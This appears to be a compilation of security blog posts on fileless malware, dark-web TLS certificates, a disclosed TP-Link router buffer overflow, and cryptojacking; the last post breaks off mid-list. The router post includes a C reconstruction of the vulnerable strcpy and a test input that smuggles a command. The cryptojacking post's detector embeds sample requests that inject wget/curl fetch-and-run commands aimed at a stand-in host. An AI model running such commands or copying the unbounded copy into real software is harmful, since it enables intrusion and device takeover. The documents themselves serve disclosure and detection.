
How to Defend Your Organization Against Fileless Malware Attacks

The threat of fileless malware and its potential to harm enterprises is growing.

Fileless malware leverages what threat actors call “living off the land,” meaning the malware uses code that already exists on the average Windows computer. When you think about the modern Windows setup, this is a lot of code: PowerShell, Windows Management Instrumentation (WMI), Visual Basic (VB), Windows Registry keys that have actionable data, the .NET framework, etc. Malware doesn’t have to drop a file to use these programs for bad intentions.

The combination of all of these code sources is generally called process hollowing — a tactic in which malware uses a particular process as a storage container and distribution mechanism for its code. One recent attack discovered by FireEye combined PowerShell, VB scripts and .NET in a single lethal package.

Attacks leveraging PowerShell are particularly on the rise. Last fall, IBM X-Force Incident Response and Intelligence Services (IRIS) demonstrated just how potent PowerShell-based exploits can be, since code is executed directly from a PC’s memory. Plus, PowerShell can be used for remote access attacks and get around application whitelisting protections.

Given this growing threat, what can security teams do to help defend their organizations against fileless malware?

Ensure Strong Companywide Security Hygiene

The general thrust of how to combat fileless malware begins with making sure your Windows computers are patched and up to date. Since one of the first things threat actors do is take advantage of unpatched, older systems, delaying patch management introduces a vulnerability into your network. The spread of EternalBlue illustrated this well; the patch was available for more than a month before the exploit was launched.

The next step is to ensure you have a solid security awareness training regimen. This doesn’t mean running annual exercises or sending out the occasional test phishing email. Instead, come up with a program that operates continuously and is always making users aware of the dangers of email attachments and clicking on links willy-nilly. Most fileless campaigns begin their life with a simple phishing email, so it is important to try to nip these entry points quickly.

Third is to understand the behavior of built-in Windows code so you can spot anomalies, such as when encrypted PowerShell scripts are installed to run as a service. The combination of the two — the encryption and the service feature — should be a red flag. Analysts sometimes see compression tools instead of or in addition to encryption as well. Another red flag is finding a PowerShell script hiding in the TEMP directory; while not technically fileless, this code quickly moves to more dangerous parts of the operating system (OS).

Understand Your Access Rights and Privileges

Organizations should understand what happens when fileless malware first detonates. Just because you have a user who clicked on a malicious attachment doesn’t mean the malware will stay on their PC. Instead, a typical behavior is for the malware to move across your network to find a richer target, such as a domain controller or web server. To prevent this, you should segment your network carefully and make sure you understand access rights, especially for third-party applications and users.

A common attack method is escalating privileges as malware moves around the network, which can be done using PowerShell, for example. They don’t call it PowerShell for nothing: An actor can issue commands for reverse Domain Name System (DNS) queries, enumerate access control lists on any network share and find members of a particular domain group. This means one of the more basic controls for any malware is to restrict administrator rights to the minimum number of systems.

Many fileless exploits count on the profligate use of rights that aren’t needed or are attached to users that have since left the company, or outdated rights for users who don’t access the targeted applications anymore. Companies should develop methods to detect when these situations occur and be able to shut them down quickly. Organizations should also disable Windows programs that aren’t needed. Not everyone needs PowerShell running on their computer, or support for the .NET framework. Even more effective is to eliminate support for ancient protocols such as SMBv1, which was what caused all the trouble with WannaCry.

Finally, while PowerShell can get around application whitelisting, it is still a good idea to deploy such controls. The more you know about how your users consume applications, the more likely you will be able to catch a piece of malware doing something that no other legitimate app has been observed doing. Another way is to disable macros, including Office macros, which are often abused by malware writers, although this isn’t a universal solution because many users do need them to do their jobs.

As a side note, Windows can be used for more than just desktop computers, and threat actors will sometimes target embedded Windows point-of-sale (POS) machines. The attraction here is that these computers have direct access to payment card data, so having extra protection for this population is crucial.

Combat Fileless Malware Threats With Careful Coordination

Microsoft hasn’t been standing still while fileless attacks run rampant. In fact, the company has developed an open interface called Antimalware Scan Interface that some vendors have begun using to make it easier to detect the “tells” of the fileless world, especially when it comes to analyzing scripting behavior.

In addition, anyone who wants to gain a better understanding of fileless attacks should check out the open source project AltFS. This is a complete fileless virtual file system to demonstrate how these techniques work, and it can be deployed on Windows and Mac PCs.

As you can see, fighting fileless malware attacks will take some serious effort and careful coordination among a variety of tools and techniques. With more unpredictable malware threats on the horizon, organizations should take steps today to strengthen their defenses.


This post appeared first on Security Intelligence
Author: David Strom


Dark Web TLS/SSL Certificates Highlight Need for Shift to Zero Trust Security

More and more, organizations and end users are embracing encryption to protect their data and traffic. By far the most visible part of this adoption is the use of Hypertext Transfer Protocol Secure (HTTPS) for accessing websites. As opposed to the more basic HTTP, which is the plain text version, HTTPS makes use of Transport Layer Security (TLS) or Secure Sockets Layer (SSL) certificates to encrypt traffic between web servers and clients.

Does this mean that once you’ve implemented TLS/SSL certificates you should no longer worry? Not exactly. There are many cyberthreats that make it necessary to stay vigilant by following a zero trust security model.

Some of the latest threats originate from thriving dark web marketplaces for these certificates, which often come packaged with other cybercrime services. But before we get to that, a little more on HTTPS and TLS/SSL.

A Very Brief Introduction to HTTPS and TLS/SSL

HTTPS is HTTP with an extra layer on top, the TLS/SSL encryption layer. This layer ensures that both the client and the server can continue to speak HTTP with each other, but over a secure connection. Under normal circumstances, this serves three main purposes:

  1. Confidentiality — preventing others from reading your communications.
  2. Integrity — making sure the web content isn’t altered in transit.
  3. Authentication — ensuring that the client (your web browser, for example) connects to the intended web server.

Setting up a security layer on your web infrastructure and adding TLS/SSL certificates to your websites undoubtedly increases security and is in the interest of your customers and users. If there’s one key task you should tackle immediately it’s migrating all your existing HTTP-only sites to HTTPS versions. Although setting up HTTPS has now become a fairly easy process with the help of tutorials such as HTTPS Is Easy! and tooling such as Certbot, there are several key elements that you should be aware of.

When the secure layer is bootstrapped, a handshake happens between the server and the client in which, among other things, the server proves its identity via TLS/SSL certificates. This identity is included as a property of the certificate and describes which domain the certificate belongs to. During this handshake, the client will also check whether it trusts the certificate, that is, whether the certificate is verified and trusted by a certificate authority (CA) that the client also trusts.

Proving Your Ownership of a Domain

To prevent people from acquiring a certificate for domains they do not own, a number of verification steps must be completed. These steps allow you to prove that you’re the rightful domain holder.

Depending on your certificate provider, you will need to prove that you control the DNS settings of the domain (by adding a TXT record, for example), have access to a specific email account belonging to that domain or are able to put up a text file on the public website of the domain.

The next level of identity checks of the domain holder happens with Extended Validation (EV) certificates. Previously, an EV certificate was represented differently in browsers via a green bar, but due to recent browser changes, these visual differences are no longer immediately noticeable for users. As such, because most users will not be able to visually differentiate between EV and non-EV certificates and because they are not necessarily more secure or cryptographically stronger than other certificates, there is really no extra value in spending on EV certificates.

HTTPS Doesn’t Mean Safe

A common misconception is that HTTPS automatically means safe. It doesn’t. It actually stands for secure, meaning that the underlying website that you access via that secure channel can still cause harm to you or your organization. This is very well demonstrated by Netcraft statistics on the number of phishing websites that make use of certificates.

But this isn’t the only threat you should be aware of when it comes to website security.

An Emerging Black Market for TLS/SSL Certificates

Research from Georgia State University and the University of Surrey, sponsored by Venafi, described the appearance of thriving marketplaces for TLS/SSL certificates on the dark web. This type of marketplace might sound strange at first. After all, you can get certificates for free, so why would you want to pay extra for obtaining TLS/SSL certificates, let alone do it on the dark web?

However, if you take a closer look at what exactly is for sale, it becomes clear that these sales do not only include a certificate, but a larger package deal.

According to the researchers, these packages include cybercrime services such as malicious websites and ransomware, but also aged domains, website design services and payment services. Some packages even offer deals that help the buyer set up a company, together with all the necessary company documents and a Data Universal Numbering System (DUNS) number. The deal is then complemented with an EV-SSL certificate from a known certificate vendor.

What Risks Are Associated With This Market?

The threats associated with these dark web offerings are not immediately linked to weaknesses in the certificates themselves, but rather to the services that are provided via the secure website that’s part of the offering.

Phishing

Phishing websites that resemble legitimate websites remain a threat. But whether a phishing site was acquired via the dark web or not doesn’t immediately increase the threat. Cybercriminals can already register new domains that resemble existing ones and acquire a valid certificate from a legitimate certificate provider outside the black market. The added advantage of these marketplaces, from an attacker’s point of view, is the inclusion of web design services and support.

Financial Loss

Another potential consequence of black market TLS/SSL certificates is financial loss due to fraud. Website visitors who assume they are dealing with a legitimate e-commerce site might be inclined to buy goods and pay for them with their credit card or other payment information.

Illicit websites often present themselves as a real online store that is protected with a proper certificate and accepts money via a trusted payment system. Even trained security professionals sometimes have a hard time differentiating between a legitimate business site and a malicious one.

Credentials Theft

Although we warn our users not to reuse passwords and request they create unique, strong passwords, we know that in practice this is not always the case. This leads us to another risk: users signing up and creating detailed accounts on legitimate-looking business websites. The threat actors behind these fake sites can not only grab any entered passwords, but they also have access to any other personal information included in setting up the profile.

From an attacker’s point of view, this becomes increasingly interesting when a victim signs up with his or her business email account or other credentials used to access corporate networks or resources. This kind of threat is typically deployed on fake online dating or job listing websites.

Man-in-the-Middle Attacks

Another risk that comes to mind with black market TLS/SSL certificates is attackers spying on encrypted traffic or conducting man-in-the-middle (MITM) attacks. This has happened in the past due to vulnerabilities in cryptographic software libraries or protocol implementations, the most prominent examples being Heartbleed, BEAST and Logjam.

Besides abusing these vulnerabilities, skilled attackers can also attempt to steal the private keys of the certificate. The latter almost always involves a breach of the company infrastructure by an attacker with advanced capabilities.

BGP Hijacking

Yet another important threat you should be aware of is Border Gateway Protocol (BGP) hijacking to obtain valid certificates — valid in the sense that the certificates have not been stolen from their rightful owner and that, according to the CA, the verification process was successful. One method involves an attacker conducting a local hijack to make the CA believe they are the owners of a targeted domain. The hijack consists of redirecting the network, especially the path used for the verification, to a network under the attacker’s control. Although this only works well if the attacker is close enough — networkwise — to the CA and the victim is relatively far, your incident response plan should take this risk into account.

How Do You Defend Against These Threats?

There is no single solution that you can apply as a defensive measure against these attacks. Instead, these are threats you can only combat with zero trust security, a layered defense model and security best practices. Get started by checking off some of these quick wins:

  • Implement certificate pinning — note that this is being superseded by Certificate Transparency, an open framework for monitoring and auditing SSL certificates.
  • Monitor for issued certificates that closely resemble the name of your organization or products. This monitoring can alert you if attackers start targeting your brand, sometimes even before a campaign has started.
  • Monitor and possibly block domains that have a high deceptive domain score.
  • Subscribe to the feeds provided by initiatives such as Phishtank or OpenPhish to proactively block access and review the proxy logs for access attempts.
  • Filter access to newly observed domains (NODs). Be aware that some offerings in the marketplace provide packages of “aged” domains, bypassing this protection measure.
  • Subscribe to a threat feed or collaborate closely with an information sharing and analysis center (ISAC) or computer security incident response team (CSIRT) to get timely updates about new malicious sites.

Further enhance your defenses with the following best practices for zero trust security:

  • Encrypt your internal traffic, especially in environments that utilize single sign-on (SSO). It’s important that every resource that requires authentication supports an encrypted communication channel.
  • Implement role-based access and make sure that users are only put in groups that are strictly necessary to do their job. Avoid having too many users with escalated privileges.
  • Lock down the environment in which users work, possibly giving them thin clients or systems that are restored to a known good image overnight.
  • Monitor your entire IT environment, including endpoints, servers and internal network traffic, and consider applying advanced technologies such as artificial intelligence to help.


This post appeared first on Security Intelligence
Author: Koen Van Impe


Buffer Overflow Vulnerability in TP-Link Routers Can Allow Remote Attackers to Take Control

Internet routers are among the most ubiquitous devices home and business users depend on every day to carry out communications, banking, shopping and commercial transactions. IBM Security researcher Grzegorz Wypych (aka h0rac) took a closer look at one of the most widespread internet routers in use by consumers nowadays, the TP-Link WR-940, and found that a zero-day buffer overflow vulnerability in the router could allow malicious third parties to take control of the device from a remote location.

Let’s dive into more details about this vulnerability, which was responsibly disclosed to TP-Link by IBM Security. TP-Link subsequently issued patches, which are listed in the closing words of this article.


Figure 1: TP-Link WR940 (Source: TP-Link)

Authenticate and Control

Looking into commonly used routers, our team of ethical hackers examined some of the models that many consumers use in their homes. The reason behind examining router security is their omnipresent status and the potential for attackers to use them against internet users and businesses alike, while mostly relying on automated attacks.

This is the first part in a series of router vulnerability reports. Here, we’ll focus on the TP-Link WR940 device and touch on the software that runs the router — more specifically, TL-WR940N hardware version 3 and TL-WR941ND hardware version 6, both running firmware version 150312.

In the case of these routers, we found a zero-day buffer overflow vulnerability, one that was not previously reported and that worked for authenticated users, allowing them to take unrestricted remote control of the router.

Looking at the software security of the device, it appears that most of the effort to apply controls was put into the web-based interface that users can access to configure the router. However, controls that were placed on the owner’s interface cannot protect the actual router and could allow an attacker to take advantage of that fact.

For example, in the System Tools/Diagnostic tab of the control panel, users have the option to send Internet Control Message Protocol (ICMP) echo requests/response packets via ping. They can send packets either to an IPv4 address or to a hostname. The panel’s security controls may limit character type and number, but nothing stops the user from intercepting requests with a Burp Suite (a graphical tool for testing web application security) proxy and malforming them.

Bug by Bug

We started by looking for some common application vulnerabilities. First we examined command injections because operations such as ping are mostly executed using a Bash shell (Bash is a Unix shell and command language). This was not the case, and we had to rule out the injection attack scenario because we did not find any reference to a system call during static analysis.

What we did find was another interesting activity: When a user sends ping requests, a message is displayed on the device’s console referring to native code compiled to the firmware’s binary.


Figure 2: Ping requests invoke a message on the router’s console

Next, we looked at outgoing GET requests to the ping service by running a Burp Suite proxy to examine them. In the following image, we can see the request’s parameters. The same parameters also appeared in the console message shown in Figure 2.


Figure 3: GET request to ping service

To zoom into the details, we launched the IDA disassembler and looked at some string references. More specifically, we were looking for the “Here is a new ping” reference.


Figure 4: GET request to ping service on IDA Pro

From here, we jumped directly to the referenced function’s address:

# DATA XREF: sub_44C610+5E0↑o

And here, we can see a notable message block:


Figure 5: Message block shown in IDA Pro

The syntax is written in the Microprocessor without Interlocked Pipeline Stages (MIPS) Assembly language, which is designed to work with the MIPS microprocessor paradigm created by J. L. Hennessy in 1981. It is typically used in embedded systems, such as gateways and routers.

Before we look more closely at this message block, here’s a quick crash course on MIPS central processing units (CPUs):

  • Function parameters are passed in registers $a0-$a3. If a function requires more than four parameters, the remaining ones are pushed onto the stack.
  • Register $t9 is often used as a holder for the jump address. We usually load the memory address and jump to it using jalr instruction.
  • The called function must save any $s0-$sX registers, where X is the max number of available registers of type $s.
  • The return value is saved in the $v0 or $v1 registers.

Classic Buffer Overflow

Armed with these basics, we can move to the next step of the analysis. In the following image, we can see that the printf function receives a pointer to a string that appears in the console log we looked at earlier (Figure 2). The parameter in this case is being loaded to the $a0 register.

Next, the ipAddrDispose function is invoked. Before the call, the value 564 (decimal) is loaded into the $a2 register, which could be a parameter to the function. Let’s jump to that function and see what’s inside.


Figure 6: ipAddrDispose’ function exposing buffer overflow issue

We won’t go through a line-by-line analysis here; this is only a fragment of the entire function. What’s interesting about it is the strcpy function call, which is the start of the TP-Link httpd process control, the vulnerable binary. What we have here is a classic buffer overflow issue.

The function copies the input it receives byte by byte and stores it in a buffer of a size that is not properly being handled. The data therefore exceeds the buffer’s boundaries.
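As an added example that is not the router’s firmware code, the following C reconstructs the unbounded strcpy pattern described above and places a hardened replacement next to it. The buffer size (64 bytes), the function names and the validation rules are assumptions; the article gives only the 224-byte stack frame.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define PING_ADDR_MAX 64   /* assumed destination buffer size (not on the page) */

/* Vulnerable shape (assumed reconstruction of ipAddrDispose): the ping_addr
 * parameter is copied with strcpy into a fixed stack buffer with no length
 * check, so anything longer than the buffer runs into the saved $s registers
 * and the return address $ra. Kept for comparison only; nothing below calls it. */
void ip_addr_dispose_vulnerable(const char *ping_addr)
{
    char addr[PING_ADDR_MAX];
    strcpy(addr, ping_addr);            /* unbounded copy: the bug */
    printf("ping target: %s\n", addr);
}

/* Accept only a dotted-decimal IPv4 literal: four octets, each 0-255. */
static int valid_ipv4(const char *s)
{
    int octets = 0;
    while (*s != '\0') {
        int value = 0, digits = 0;
        if (!isdigit((unsigned char)*s)) return 0;
        while (isdigit((unsigned char)*s)) {
            value = value * 10 + (*s - '0');
            if (++digits > 3 || value > 255) return 0;
            s++;
        }
        octets++;
        if (*s == '.') {
            s++;
            if (*s == '\0') return 0;   /* trailing dot */
        } else if (*s != '\0') {
            return 0;                   /* any other character, e.g. ';' */
        }
    }
    return octets == 4;
}

/* Accept only an RFC 1123 hostname: labels of letters, digits and hyphens,
 * 1-63 chars each, no leading or trailing hyphen, at most 253 chars in total. */
static int valid_hostname(const char *s)
{
    size_t len = strlen(s), label = 0;
    if (len == 0 || len > 253) return 0;
    for (size_t i = 0; i <= len; i++) {
        char c = s[i];
        if (c == '.' || c == '\0') {
            if (label == 0 || label > 63 || s[i - 1] == '-') return 0;
            label = 0;
        } else if (isalnum((unsigned char)c) || c == '-') {
            if (label == 0 && c == '-') return 0;
            label++;
        } else {
            return 0;
        }
    }
    return 1;
}

/* Hardened version: bound the length first, then accept only a well-formed
 * target. Returns 0 on success, -1 if the input does not fit the buffer,
 * -2 if it is not a valid IPv4 literal or hostname. */
int ip_addr_dispose_safe(const char *ping_addr, char *out, size_t out_len)
{
    if (ping_addr == NULL || out == NULL || out_len == 0) return -2;
    size_t n = 0;
    while (n < out_len && ping_addr[n] != '\0') n++;
    if (n == out_len) return -1;        /* no room for the NUL terminator */
    if (!valid_ipv4(ping_addr) && !valid_hostname(ping_addr)) return -2;
    memcpy(out, ping_addr, n + 1);      /* bounded copy including the NUL */
    return 0;
}

/* Runs the safe version against a PING_ADDR_MAX-byte stack buffer. */
int check_target(const char *ping_addr)
{
    char addr[PING_ADDR_MAX];
    return ip_addr_dispose_safe(ping_addr, addr, sizeof addr);
}

/* Builds a string of n 'A' (0x41) bytes, like the 300-byte test in the
 * article, and checks it. Capped at 1023 bytes so the local buffer fits. */
int check_repeated_a(size_t n)
{
    char payload[1024];
    if (n > sizeof payload - 1) n = sizeof payload - 1;
    memset(payload, 'A', n);
    payload[n] = '\0';
    return check_target(payload);
}

int main(void)
{
    printf("%d\n", check_target("192.168.0.1"));    /* 0: valid IPv4 */
    printf("%d\n", check_target("router.lan"));     /* 0: valid hostname */
    printf("%d\n", check_repeated_a(300));          /* -1: rejected, too long */
    printf("%d\n", check_target("1.2.3.4;reboot")); /* -2: rejected, not a target */
    return 0;
}
```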

We have our bug, but can it truly be exploited? We can find out whether this zero-day is critical by creating a proof-of-concept of an attack scenario.

Status: Exploitable

The first action to attempt when looking at a buffer overflow is to check what happens when the data size exceeds the available space. We will therefore change the ping_addr parameter to hold a number of 0x41 (“A”) bytes exceeding the buffer’s size. In the following image, the ipAddrDispose function reserves 224 bytes (hexadecimal 0xE0) for its stack frame.


Figure 7: ipAddrDispose reserves 224 bytes for its stack frame

Since the stack frame can take 224 bytes, we elected to send 300 bytes of A’s instead and see what happens. To do that, we modified the ping_addr parameter in the HTTP request after intercepting it with a Burp Suite instance.


Figure 8: Sending 300 bytes of A’s to limited stack

By the following message on the console, we can see that, indeed, it is possible to override the return address $ra and begin controlling program execution.


Figure 9: Router console message shows that address override is possible

Some Pre-Exploit Recon

Before writing an exploit, it is wise to check what is being overwritten here when the oversized payload is sent through. Let’s take a closer look at the core memory dump, which is typically dumped to the /tmp folder.

What we are looking for is information that will help craft the exploit down the line. More specifically, we want to see what registers we can control if we exploit this bug.

To analyze the core memory dump, we downloaded it to our host and placed it in the folder where the extracted file system is found (the httpd binary).


Figure 10: Analyzing TP-Link router core memory dump

Remember, this is MIPS architecture. The next step here will be to open the core dump using gdb-multiarch, which is a GNU Debugger (GDB) with support for multiple architectures. GDB is a source-level debugger that is capable of breaking programs at any specific line, displaying variable values and determining where errors occurred.


Figure 11: Using gdb-multiarch to open core memory dump

We can now control three registers:

  1. $s0;
  2. $s1; and
  3. $ra.

The $a0 register was only partially under our control because it only refers to an address on the stack. Also, keep in mind that the exploitation is taking place on MIPS architecture, which is very different from an exploit written for web application buffer overflow bugs. With this information, we started writing a working exploit code.

Routers: A Modern-Day Essential in Dire Need of Better Security

The American Consumer Institute (ACI) looked into router security and found that no less than 83 percent of routers harbor high-risk vulnerabilities, many of which are open-source flaws. This staggering ratio accounts for both home and office routers and includes major name brands sold around the world.

Routers are not just a relay switch; they have their own operating systems, their own software and, inevitably, their own vulnerabilities. Router vulnerabilities are rather common and can be attributed to various factors. It starts with internet service providers (ISPs) issuing the same router to millions of customers and inadvertently allowing vulnerability aggregation when zero-days arise, but it has more to do with the software that runs routers.

Most manufacturers outsource firmware that gets developed with costs in mind. As such, it is rarely elaborate and, judging by the amount of router vulnerabilities out there, also rarely tested or secure. Making matters worse is the patch and update process: When was the last time you got a message prompting you to update your router’s firmware? Likely almost never. This means that even when patches are dealt with and become available to the public, most users will never know of them or know to take action.

We won’t delve into open networking ports and unsecured protocols that run home routers — think Universal Plug and Play (UPnP), Home Network Administration Protocol (HNAP) and the Wi-Fi Protected Setup (WPS) password — but those interested in further reading should look them up.

How much do these vulnerabilities matter? A lot. At the very least, router vulnerabilities can lead to consumer data being compromised and used by attackers. The same issue can allow criminal/nation-state third parties to spy on users, send them to phishing and malware-hosting websites, or alter data the user sends out when browsing the internet. Routers can also be infected by malware and enslaved by a malicious internet of things (IoT) botnet such as VPNFilter, which can eavesdrop on traffic passing through the router, or the Mirai botnet, which disrupted internet connections as well as telephony and television services in Germany for days before it was possible to stop the mayhem.

Vulnerabilities on routers used by businesses can have similar impacts at scale and likely touch on even more valuable information that could interest cybercriminals and nation-state threat actors alike.

Secure Development, Testing and Better Controls

Limiting the vulnerability of any software to attacks is a task that calls for security in the early stages of the development cycle. The sooner security professionals are introduced to the project, the better the chances are that the end result will be more secure; as a bonus, it is also likely to be much less costly. If that is not a possibility, not all is lost: Scanning code after it is written can also help fix issues and make it more resilient to attacks.

Another way to find and fix issues after devices have been released to the marketplace is by testing them. Penetration testing should look at both code-related security gaps and hardware-related exploitation possibilities. When these are found, they should be prioritized for remediation and addressed promptly to secure the user base from potential attacks.

Router vendors can better enable users with additional security controls: longer password standards, two-factor authentication (2FA) options, more warning prompts when remote access can be attained by unauthorized parties, and the ability to separate modem and router functions, to name a few. Routers are an essential part of almost every home’s communication consumption, and security has become equally essential to keep those homes and their residents’ data and privacy safe.

TP-Link Patches for Users of These Models

After disclosure, TP-Link’s security team released a patch and indicated that both devices in these hardware versions are no longer being manufactured (product end of life).

The new firmware has been published on the website for both devices in their affected hardware revisions (firmware is labeled 190218).

Support/Download Page Links


This post appeared first on Security Intelligence
Author: Grzegorz Wypych


Cryptojacking Attacks: Who’s Mining on Your Coin?

Data from the “IBM X-Force Threat Intelligence Index” for 2018 illustrated that threat actors have been increasingly using malicious cryptomining, aka cryptojacking attacks, to easily monetize their access to systems with minimal risk. The 2019 report showed that threat actors continue to use these attacks to compromise systems and generate a revenue stream.

There are two types of cryptomining attacks that have been making the rounds since 2018:

  1. Malicious mining via compromised websites, also known as cryptojacking. A script runs inside the visitor’s browser for as long as the page stays open.
  2. Malware-based cryptomining attacks on a user’s device. A native miner is installed on the device and draws on its full central processing unit (CPU) capacity, independent of any browser session.

In 2018, X-Force saw more browser-based mining than the malware-based variety: our data shows a nearly 2:1 ratio. Cryptojacking presents a particular challenge for organizations to detect and mitigate because the malicious scripts are almost always hosted outside the organization’s zone of control, on third-party sites that its users happen to visit.

Cryptojacking definitely trended in 2018, but are tides about to turn? X-Force data from late 2018 and early 2019 showed that browser-based cryptojacking attacks are on the decline while also revealing a notable increase in malware-based attacks.

Cryptomining Malware: A Primer

The value and popularity of cryptocurrency have been growing across the globe, and criminals are always looking for ways to generate passive income. One of the ways they tie the two together is by using coin-mining malware. Research from X-Force has addressed cryptocurrency miners before. To review, cryptominers are placed on an infected machine or device and use its native processing power to mine for cryptocurrency.

Historically, threat actors have targeted individual user boxes to drop cryptocurrency miners on, but recent research from X-Force Incident Response and Intelligence Services (IRIS) suggested that since at least 2017, threat actors have also tried to infect targeted internet of things (IoT) devices despite their low processing power.

What Could Be Driving a Shift to Cryptojacking?

Why would threat actors use malicious cryptomining instead of focusing on other attacks such as ransomware, for example? Threat actors can see some success in getting their malware on user devices, but for those motivated by monetary gain, converting that access into spendable currency has always been a challenge.

Over time, cybercriminals have tried different methods, such as selling stolen data, locking a device and demanding ransom payment from its owner, and selling a remote shell to the compromised device to other threat actors who can then deploy their own attack tactics on that device.

All of these tactics primarily require other people to become involved in their success — an option most criminals prefer to forgo if only to avoid sharing the spoils. But they can’t sell access or data without a buyer, nor can they profit from ransomware without someone on the other end willing to pay. To minimize interaction with other parties, including victims who may or may not pay, many criminals evidently prefer cryptojacking. These attacks are suited for cybercriminals at any skill level, do not require much in terms of interaction with third parties and can be monetized relatively easily when compared with malware operations such as ransomware and banking Trojans.

To get cryptomining malware onto devices, threat actors often exploit command injection flaws in enterprise-facing assets, such as vulnerable applications in content management systems (CMSs). In instances observed by X-Force IRIS, the injected commands used wget or curl to download the malicious payload onto the victim machine. Victims have also been infected simply by visiting a malicious page reached through a link in an email or through a compromised site.
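As an added example (not X-Force code), the following Python script scans web server access logs for the wget/curl pattern just described: it URL-decodes each request target (repeatedly, so double-encoded payloads are not missed) and flags parameters in which a shell separator or subshell is followed by a download command and a URL. The log lines are constructed for illustration, and the field layout is assumed to be the Apache/Nginx combined format.

```python
"""Flag web requests whose parameters inject a wget/curl payload fetch.
Added example for this article, not IBM X-Force code.
The access-log lines below are constructed; the combined log format is assumed."""
import re
from urllib.parse import unquote_plus

# Constructed sample log (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = r'''
203.0.113.7 - - [12/Mar/2019:10:14:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2019:10:14:05 +0000] "GET /cms/upload.php?file=a.txt;wget%20http://198.51.100.23/x.sh%20-O%20/tmp/x.sh;sh%20/tmp/x.sh HTTP/1.1" 200 312 "-" "python-requests/2.18"
203.0.113.9 - - [12/Mar/2019:10:14:06 +0000] "POST /cms/admin/ajax.php HTTP/1.1" 200 90 "-" "curl/7.58.0"
203.0.113.11 - - [12/Mar/2019:10:15:40 +0000] "GET /search?q=%257C%257Ccurl%2520-s%2520http%253A%252F%252F198.51.100.23%252Fminer%2520%257C%2520sh HTTP/1.1" 500 0 "-" "Mozilla/5.0"
203.0.113.12 - - [12/Mar/2019:10:16:01 +0000] "GET /docs?q=how+to+use+wget HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
'''

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A shell separator (; | & backtick) or subshell $( followed by a downloader and a URL.
# Plain text that merely mentions wget (e.g. a search for "how to use wget") does not match.
FETCH_RE = re.compile(
    r'(?:[;|&`]|\$\()\s*(?P<tool>wget|curl)\b.*?(?P<url>(?:https?|ftp)://[^\s;|&"\'`)]+)',
    re.IGNORECASE,
)


def decode_target(target: str, max_rounds: int = 3) -> str:
    """URL-decode until the value stops changing (bounded) so double encoding is caught."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def find_payload_fetches(log_text: str) -> list:
    """Return one record per request whose target injects a wget/curl download."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_target(m.group("target"))
        f = FETCH_RE.search(decoded)
        if f:
            hits.append({
                "src": m.group("ip"),
                "ts": m.group("ts"),
                "path": decoded.split("?", 1)[0],
                "tool": f.group("tool").lower(),
                "url": f.group("url"),
                "status": int(m.group("status")),
            })
    return hits


if __name__ == "__main__":
    for h in find_payload_fetches(SAMPLE_LOG):
        print(f'{h["ts"]} {h["src"]} -> {h["path"]} {h["tool"]} {h["url"]} (HTTP {h["status"]})')
```

Run against the constructed log it reports two requests, both pulling from 198.51.100.23: one via `;wget`, one double-encoded via `||curl ... | sh`. A 500 response on the injected request does not mean the attempt failed (the shell may have run before the application errored), so treat the fetched URL as an indicator either way.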

2018: The Rise of Cryptomining in the Browser

Browser-based cryptojacking involves a threat actor compromising a web server or website and injecting a cryptomining script into an otherwise legitimate page. Alternatively, the script can be embedded in an online advertisement served through a legitimate ad network (malvertising), so that it runs every time the ad is rendered in a visitor’s browser.

X-Force research saw an explosion of cryptojacking activity in 2018, with browser-based cryptojacking far exceeding all other forms of cryptocurrency-related attack, including outright coin theft.

Some of this rise in browser-based cryptojacking comes from unintended sources, such as vendors who sell mining scripts to site owners as an alternative to running advertisements. The initial purpose is legitimate, but the same scripts can be used by attackers who run them on compromised websites. One of the largest providers of mining scripts of that type was Coinhive, an organization that pioneered the sale of these scripts. Because Coinhive scripts were so often used in cryptojacking attacks, users and security professionals would frequently see the name “Coinhive” or “Coinhive.Miner” appear in alerts as the detected threat. In March 2019, Coinhive voluntarily ceased operations.

Figure 1: Cryptojacking attacks exceeded malware cryptomining attacks by a nearly 2:1 ratio in 2018 (source: IBM X-Force)

Cryptojacking Was Big in 2018, So Why Shift to Cryptomining Malware in 2019?

As our data shows, browser-based cryptojacking was big in 2018. But as we moved into 2019, our data started showing a decline in that type of attack and a return to malware-based cryptomining. A number of factors could be contributing to this shift.

One possibility is that the recent drop in cryptocurrency prices has made mining in the browser less profitable. A mining script runs inside the browser’s sandbox, typically as single-threaded JavaScript or WebAssembly, and stops the moment the tab is closed, so it cannot draw on a device’s processing power the way a native miner installed by malware can. As a result, browser-based cryptojacking takes much longer to earn each coin, which may be pushing threat actors back toward malware infections to speed things up.

Additionally, the sharp reduction in cryptocurrency value could be pushing some actors to an entirely different revenue stream. If browser-based attacks drop off faster than malware-based ones, cryptomining malware would account for a higher proportion of the activity we observe even if its absolute volume has also fallen.

Threat actors could also be temporarily shifting away from browser-based cryptojacking if they relied on Coinhive to provide them with scripts. With Coinhive gone, threat actors would have to go to other script providers. While there are many other providers of the same sort of scripts, the removal of Coinhive could affect the overall ability of the technically unskilled to create web-based cryptojacking attacks.

Don’t rejoice just yet: browser-based cryptojacking may see a resurgence in the near future because of the recent and sharp drop in the Monero network hash rate. When the network hash rate falls, mining difficulty adjusts downward, so the same amount of hashing earns a larger share of block rewards. That makes even low-power browser mining more profitable than it was.

Which Should I Worry About More: Browser-Based Cryptojacking or Cryptomining Malware?

The short answer is both. X-Force data indicates that while browser-based cryptojacking was increasingly popular through most of 2018, cryptomining malware made a resurgence at the end of 2018 and into the first quarter of 2019.

Figure 2: IBM X-Force data showing the rise and fall of cryptojacking popularity (source: IBM X-Force)

Browser-based cryptojacking was very popular with threat actors earlier in 2018, likely due to the following factors:

  • Without having to use malware and maintain a botnet, browser-based attacks can be easier for cybercriminals to set up compared to other forms of cryptomining attacks.
  • Threat actors needed only to infect a single web server to deploy a cryptojacking script to all visitors of that site and any other sites hosted thereon.
